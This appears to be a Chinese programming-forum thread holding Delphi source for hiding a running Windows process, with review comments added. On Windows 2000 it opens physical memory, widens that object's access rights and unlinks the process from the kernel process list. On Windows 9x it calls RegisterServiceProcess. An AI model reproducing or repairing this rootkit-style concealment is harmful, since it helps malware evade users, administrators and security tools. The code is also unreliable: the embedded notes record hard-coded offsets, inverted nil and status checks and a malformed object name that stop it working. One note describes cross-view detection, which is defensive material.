    tmp:=PULONG(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $fffff000, $1000)); 
    if (tmp<>nil) then 
    begin 
    result:= FALSE; 
    exit; 
    end; 
    PTArrayULONG(tmp)^[(phys and $FFF) shr 2]:=data; 
    UnmapViewOfFile(tmp); 
    result:= TRUE; 
    end; function TMyHideProcess.HideProcess2000():bool;
    { HideProcess2000 body (header on the previous line): reads the current-thread pointer
      from the fixed kernel address $FFDFF124, the owning process from thread+$22C, and
      that process's list links from process+$A0 (Flink) and +$A4 (Blink); then writes
      Flink^.Blink := Blink and Blink^.Flink := Flink, i.e. unlinks the current process
      from the doubly-linked process list. Finally unmaps the directory view, closes the
      section and unloads ntdll.
      NOTE(review): the three offsets are hard-coded for one Windows 2000 x86 layout and
      are wrong on any other build. GetData's results are not checked; with the inverted
      nil test in GetData every successful read yields 0, so the SetData calls target
      addresses 4 and 0 (and, by the same inversion, do not actually write). Returns TRUE
      even when InitNTDLL fails; the OpenPhysicalMemory failure path leaves ntdll loaded.
      The hidden block's own Flink/Blink are left intact.
      NOTE(review): detection of this class of hiding is cross-view: compare the linked
      list with other process enumerations (handle-, thread- or scheduler-based). }
    var
    thread, process ,fw ,bw :ULONG;begin 
    if InitNTDLL() then 
    begin 
    if (OpenPhysicalMemory()=0) then 
    begin 
    result:= FALSE; 
    exit; 
    end; 
    thread:=GetData(PVOID($FFDFF124)); 
    process:=GetData(PVOID(thread+$22c)); 
    fw:=GetData(PVOID(process+$a0)); 
    bw:=GetData(PVOID(process+$a4));
    // standard LIST_ENTRY unlink: next.Blink := prev; prev.Flink := next
    SetData(PVOID(fw+4),bw);
    SetData(PVOID(bw),fw);
    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL(); 
    end; 
    result:= TRUE;end; 
    { HideProcess98 - Windows 9x path: call kernel32!RegisterServiceProcess(pid,
      RSP_SIMPLE_SERVICE), which registers the process as a service so the Close Program
      (Ctrl+Alt+Del) list omits it. The export does not exist on NT-based Windows.
      NOTE(review): GetProcAddress is not checked; on NT the nil function pointer would be
      called. The result of RegisterServiceProcess is ignored. }
    procedure TMyHideProcess.HideProcess98(); 
    type pRegisterService=function (a,b:DWORD):boolean; stdcall; 
    var 
    hKernel : HMODULE ; 
    RegisterService: pRegisterService ; 
    begin 
    hKernel := LoadLibrary('kernel32.dll'); 
    if(hKernel>0) then 
    begin 
    @RegisterService :=GetProcAddress(hKernel,'RegisterServiceProcess');
    RegisterService(GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
    FreeLibrary(hKernel); 
    hKernel :=0;
    end; 
    end; end.
      

  11.   


    { OpenPhysicalMemory (re-posted by the asker as the part that does not compile) -
      open \Device\PhysicalMemory for read/write mapping and map one page at physical
      $30000 into g_pMapPhysicalMemory, which LinearToPhys treats as the page directory.
      Returns the section handle, or 0. If the first open is refused, re-open with
      READ_CONTROL or WRITE_DAC, widen the DACL (SetPhyscialMemorySectionCanBeWrited),
      close, and open again for mapping.
      NOTE(review): the highlighted ("red") fragment is not recoverable from this
      plain-text copy. Things to check first are the interface-section declarations this
      body depends on: ZWOPENSECTION's SectionHandle:PInteger versus g_hMPM:THANDLE, and
      NTSTATUS=Longint versus STATUS_ACCESS_DENIED=$C0000022.
      NOTE(review): two logic errors independent of compiling - Delphi string literals
      have no backslash escapes, so the object name passed is literally
      \\Device\\PhysicalMemory (doubled); and "if status=0" gives up on STATUS_SUCCESS (0)
      while continuing to MapViewOfFile when the open failed. }
    function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
    var  
    status: NTSTATUS ;
    physmemString:UNICODE_STRING;  
    attributes:OBJECT_ATTRIBUTES;
    begin
    RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory'));attributes.Length := sizeof(OBJECT_ATTRIBUTES);  
    attributes.RootDirectory := nil;  
    attributes.ObjectName := @physmemString;  
    attributes.Attributes := 0;  
    attributes.SecurityDescriptor := nil;
    // first try: read/write mapping rights; fall back to rewriting the DACL if refused
    attributes.SecurityQualityOfService := nil;  status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);  if(status = STATUS_ACCESS_DENIED) then  
    begin  
    status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);  
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);  
    CloseHandle(g_hMPM);  
    status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);  
    end;  if status=0 then  
    begin  
    result:= 0;  
    exit;  
    end;  g_pMapPhysicalMemory := MapViewOfFile(  
    g_hMPM,
    4,  
    0,  
    $30000,  
    $1000);  if( g_pMapPhysicalMemory = nil ) then  
    begin  
    result:=0;  
    exit ;
    end;  result:= g_hMPM;end;  
    楼上的在不在？
    上面红色的那段编译不过去。